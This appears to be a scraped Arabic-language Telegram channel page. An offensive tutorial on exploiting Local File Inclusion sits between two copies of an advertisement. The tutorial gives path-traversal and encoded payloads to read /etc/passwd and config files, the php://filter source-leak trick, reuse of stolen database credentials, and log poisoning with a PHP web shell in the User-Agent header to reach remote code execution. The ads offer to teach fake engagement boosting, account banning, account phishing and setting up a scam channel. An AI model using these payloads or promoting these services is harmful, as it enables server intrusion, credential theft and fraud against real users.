2 933
Obunachilar
+324 soatlar
+157 kunlar
+26730 kunlar
Postlar arxiv
2 932
تريد تدخل مجال شغل على تلي؟ °وتسوي متجر؟
◍اعلمك رشق انستا😀
◍اعلمك رشق تيك 🎶
◍اعلمك على شحن ببجي بيدك!
◍اعلمك على رشق تويتر😀
◍اعلمك على رشق بوتات تلي😀
◍اعلمك على رشق باقي تطبيقات💎
◍اعلمك طريقه تصعيد قنوات حقيقي📱
◍اعلمك على خدمات الرشق الرخيصه🔥
◍اعلمك تبنيد قنوات وحسابات😀
◍اعلمك برمجه بايثون🕐
◍اعلمك استثمار بلرشق🔝
◍انطيك مواقع رشق رخيصه 💯
◍انطيك بوت رشق اسعار رخيصه💸
◍انطيك بوت بيع ارقام كسر👻
◍انطيك ملفات بوتات 😀
◍انطيك سورس صيد يوزرات مفول😀
◍انطيك اداة نشر تلقائي 😀
◍انطيك بوت نشر تلقائي 🦅
◍انطيك صانع بوتات من دون حقوق 🎁
◍انطيك قناة ملحقات تصميم 🌀
◍انطيك بوت معرفه انشاء حسابك〰️
◍اعلمك طريقه تجيب رباعي مجاني🍀
◍اعلمك تصيد تيك عالي😀
◍اعلمك صنع مواقع 💢
◍اعلمك تفك سكيور🔥
◍اعلمك طريقه يوزرات تيك عربيه⭐️
◍اعلمك فك باند سبام💀
◍اعلمك باند سبام 👺
◍اعلمك تجيب ارقام اي دوله ⭐️
◍اعلمك ترشق كروب مجاني✔️
◍انطيك ثغره رشق تيك مجاني🏴☠️
◍اعلمك تسوي قناة انشاء 1970🤩
◍اعلمك ترفع استضافات💀
◍اعلمك تسوي قناة احتيالي🌟
كاعد اسربه تفاعل بين ما اكمل
2 932
Local File Inclusion (LFI)
ثغرة قراءه ملفات النظام
هفهمك ازاي تستغل LFI بشكل متطور عشان تطلع معلومات حساسه او توصل لـ RCE
━━━━━━━━━━━━━━
لو عندك endpoint بيطلب اسم ملف بالشكل ده
index.php?page=homeجرب تغير القيمه لـ:
index.php?page=../../../../etc/passwd
لو رجعلك ملف في user:names:hashes زي:
root:x:0:0:root:/root:/bin/bash
يبقى كده واضح ان في LFI حاصله لان السيرفر سمح لك تطلب ملف من ملفات النظام
━━━━━━━━━━━━━━
اول حاجة تعملها:
اختبر العمق بتاع (../ ) و شوف السيرفر بيمنعك ولا لا يعني جرب
?page=../../../../../../../../etc/passwd
?page=..%2f..%2f..%2f..%2fetc%2fpasswd
?page=..%252f..%252fetc%252fpasswd
هقولك لي عشان في بعض الاحيان السيرفر بيعمل urldecode مره او مرتين فانت لازم تجرب كل الاحتمالات
━━━━━━━━━━━━━━
تاني حاجه
لو السيرفر بيمنعك من استخدام (../) او بيعمل sanitize للـ path جرب تستغل اكواد php زي
?page=php://filter/read=convert.base64-encode/resource=indexده بيخليك تشوف كود الصفحه الاصليه لو في ملف php و بتقدر تحلله بعد ما تفكو base64 و الطريقه دي مش متوقعه من الفلاتر العاديه ━━━━━━━━━━━━━━ تالت حاجه جرب توصل للملفات الحساسه زي
/etc/passwd — لويندوز جرب C:\Windows\win.iniملفات الكونفيج للمواقع غالبا بتكون زي:
config.php
.env
wp-config.php لو WordPress
.htpasswd
.bash_history━━━━━━━━━━━━━━ لو وصلت لكود في database credentials خد البيانات وجرب تسجل دخول للـ DB مباشره او جرب تستغلها في login panel على الموقع ━━━━━━━━━━━━━━ هقولك دلوقتي تقدر توصل لـ RCE ازاي لو تقدر تكتب لوج للسيرفر زي Apache access logs او error logs فممكن تبعت request في كود PHP و تحاول توصلو بعد كده من خلال LFI مثلا ابعت Request كده:
User-Agent: <?php system($_GET['cmd']); ?>
وبعدها روح لـ
index.php?page=/var/log/apache2/access.log&cmd=ls
لو الصفحه رجعتلك ناتج الكوماند يبقى كده عملت RCE باستخدام لوجات السيرفر
━━━━━━━━━━━━━━
ممكن تلاقي فيها LFI
صفحات بتعرض محتوى بناء على باراميتر زي file= او page=
Panels فيها logs او templates بتتغير من الـ URL
سكربتات بلغة PHP غالبا بتبقى vulnerable اكتر
━━━━━━━━━━━━━━
ادوات هتساعدك:
Fimap
https://github.com/kurobeats/fimap
اداه متطوره لـ LFI/RFI
BurpSuite
https://portswigger.net/burp
لتكرار الـ requests وتحليل الردود
ffuf
https://github.com/ffuf/ffuf
لو عايز تعمل brute force على اسماء الملفات
━━━━━━━━━━━━━━
حجات مهمه
اختبر مختلف انواع الـ encoding
(URL و double URL و base64)
جرب كل الـ
wrappers بتاعة PHP زي php://, data://, expect://خد بالك من ان بعض الملفات بتترمي في اماكن مؤقتة زي (/tmp) سجل كل حاجه انت بتعملها علشان تقدر تبني عليها لو السيرفر بيرن PHP نسخه قديمه استغل الـ wrappers في remote code execution ━━━━━━━━━━━━━━ الـ LFI مش بس لقراءة الملفات ده باب لـ post-exploitation كامل ممكن تخش منو لجهاز السيرفر نفسو لو دماغك شغالة صح اهم حاجة تكون فاهم الـ context و بتفكر خارج الصندوق ━━━━━━━━━━━━━━ ● الــمــصــدر ●
2 932
تريد تدخل مجال شغل على تلي؟ °وتسوي متجر؟
◍اعلمك رشق انستا😀
◍اعلمك رشق تيك 🎶
◍اعلمك على شحن ببجي بيدك!
◍اعلمك على رشق تويتر😀
◍اعلمك على رشق بوتات تلي😀
◍اعلمك على رشق باقي تطبيقات💎
◍اعلمك طريقه تصعيد قنوات حقيقي📱
◍اعلمك على خدمات الرشق الرخيصه🔥
◍اعلمك تبنيد قنوات وحسابات😀
◍اعلمك برمجه بايثون🕐
◍اعلمك استثمار بلرشق🔝
◍انطيك مواقع رشق رخيصه 💯
◍انطيك بوت رشق اسعار رخيصه💸
◍انطيك بوت بيع ارقام كسر👻
◍انطيك ملفات بوتات 😀
◍انطيك سورس صيد يوزرات مفول😀
◍انطيك اداة نشر تلقائي 😀
◍انطيك بوت نشر تلقائي 🦅
◍انطيك صانع بوتات من دون حقوق 🎁
◍انطيك قناة ملحقات تصميم 🌀
◍انطيك بوت معرفه انشاء حسابك〰️
◍اعلمك طريقه تجيب رباعي مجاني🍀
◍اعلمك تصيد تيك عالي😀
◍اعلمك صنع مواقع 💢
◍اعلمك تفك سكيور🔥
◍اعلمك طريقه يوزرات تيك عربيه⭐️
◍اعلمك فك باند سبام💀
◍اعلمك باند سبام 👺
◍اعلمك تجيب ارقام اي دوله ⭐️
◍اعلمك ترشق كروب مجاني✔️
◍انطيك ثغره رشق تيك مجاني🏴☠️
◍اعلمك تسوي قناة انشاء 1970🤩
◍اعلمك ترفع استضافات💀
◍اعلمك تسوي قناة احتيالي🌟
